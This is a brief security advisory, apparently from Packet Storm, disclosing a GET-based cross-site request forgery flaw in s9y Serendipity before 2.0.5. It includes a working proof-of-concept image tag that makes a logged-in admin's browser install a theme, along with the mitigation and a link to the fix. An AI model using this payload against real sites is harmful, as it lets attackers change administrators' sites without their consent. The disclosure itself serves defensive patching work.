s9y Serendipity Cross Site Request Forgery

2017-04-11T00:00:00
ID PACKETSTORM:142086
Type packetstorm
Reporter Zhiyang Zeng
Modified 2017-04-11T00:00:00

Description

                                        
                                            `Details  
  
======  
  
  
Software: s9y Serendipity  
  
Version: <2.0.5  
  
Homepage: https://docs.s9y.org/  
  
  
=======  
  
  
Description  
  
================  
  
Get type CSRF in Serendipity allows attacker installs any themes, no token here.  
  
  
POC:  
  
  
========  
  
  
include this in the page ,then attack will occur:  
  
  
<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>  
  
  
  
Mitigations  
  
=======  
  
  
update to Serendipity v2.1.x  
  
  
========  
  
  
FIX:  
  
  
==========  
  
  
https://github.com/s9y/Serendipity/issues/452  
  
  
Best regards,  
  
  
Zhiyang Zeng of Tencent security platform department  
`